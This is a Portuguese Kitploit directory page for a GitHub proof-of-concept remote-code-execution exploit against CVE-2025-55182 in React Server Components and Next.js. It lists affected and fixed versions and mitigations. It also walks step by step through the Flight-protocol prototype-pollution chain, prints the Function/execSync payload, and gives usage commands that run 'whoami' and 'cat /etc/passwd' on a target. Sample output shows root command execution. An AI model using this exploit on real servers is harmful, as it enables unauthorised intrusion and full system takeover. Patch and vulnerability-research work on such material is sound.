Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182_PoC — Prova de Conceito RCE para CVE‑2025‑55182 explorando o protocolo React Flight no Next.js App Router. | Kitploit
Ferramentas/GitHubGitHub/rl0x01/cve-2025-55182_poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubrl0x01/cve-2025-55182_poc

CVE-2025-55182_PoC

Prova de Conceito RCE para CVE‑2025‑55182 explorando o protocolo React Flight no Next.js App Router.

Ver Repositório
12há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 - React Server Components RCE PoC

Autor: rl0x01

Descrição

CVE-2025-55182 é uma vulnerabilidade crítica (CVSS 10.0) de Execução Remota de Código (RCE) que afeta os React Server Components por meio do protocolo Flight.

Versões Vulneráveis

Next.jsReact
14.3.0-canary.77 a 15.0.419.0.0
15.1.1-canary.0 a 15.1.819.1.0
15.2.0-canary.0 a 15.2.519.1.1
15.3.0-canary.0 a 15.3.519.2.0
15.4.0-canary.0 a 15.4.7
15.5.1-canary.0 a 15.5.6
16.0.0-canary.0 a 16.0.6

Versões Corrigidas

Next.js
15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+

Mecanismo de Exploração

  1. Usa $@ para obter uma referência bruta de Chunk
  2. Sobrescreve .then com Chunk.prototype.then via $1:__proto__:then
  3. Define status como resolved_model para acionar initializeModelChunk
  4. Usa $B1337 para acionar a desserialização de Blob
  5. Aponta _formData.get para o construtor Function
  6. _prefix contém o código JS a ser executado

O código é avaliado por meio de:

root@kitploit:~
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")

Instalação

root@kitploit:~
pip install -r requirements.txt

Uso

Verificar se o alvo está vulnerável

root@kitploit:~
python cve_2025_55182_poc.py https://target.com --check-only

Executar um comando

root@kitploit:~
# Default command (id)
python cve_2025_55182_poc.py https://target.com

# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"

Opções

OpçãoDescrição
urlURL do alvo (obrigatório)
-c, --commandComando a ser executado (padrão: id)
--check-onlyApenas verificar vulnerabilidade
-t, --timeoutTempo limite em segundos (padrão: 15)
-v, --verboseSaída detalhada
--rawMostrar resposta bruta

Laboratório de Teste Vulnerável

root@kitploit:~
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000

Exemplo de Saída

root@kitploit:~
+======================================================================+
|  CVE-2025-55182 - React Server Components RCE                     |
|  React Flight Protocol Deserialization Vulnerability               |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01

[*] Target: http://localhost:3000
[*] Timeout: 15s

[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received

[2/2] Executing command: whoami
[+] Payload sent!

============================================================
RESULT: whoami
============================================================
root
============================================================

Estrutura do Projeto

root@kitploit:~
CVE-2025-55182/
├── cve_2025_55182_poc.py    # Main exploit script
├── requirements.txt          # Python dependencies
├── README.md                 # Documentation
└── vulnerable-app/           # Vulnerable Next.js app for testing
    ├── package.json
    ├── next.config.js
    └── app/
        ├── layout.js
        ├── page.js
        └── actions.js

Aviso Legal

⚠️ Esta ferramenta é fornecida apenas para fins educacionais e de testes de segurança autorizados.

O uso não autorizado desta ferramenta contra sistemas que você não possui ou sem permissão explícita para testar é ilegal.

Mitigação

  1. Atualize o Next.js para 15.0.5+, 15.1.9+, 15.2.6+, 15.3.6+, 15.4.8+, 15.5.7+ ou 16.0.7+
  2. Atualize o React para uma versão corrigida
  3. Implemente regras de WAF para bloquear payloads maliciosos do protocolo Flight
Baixar ferramenta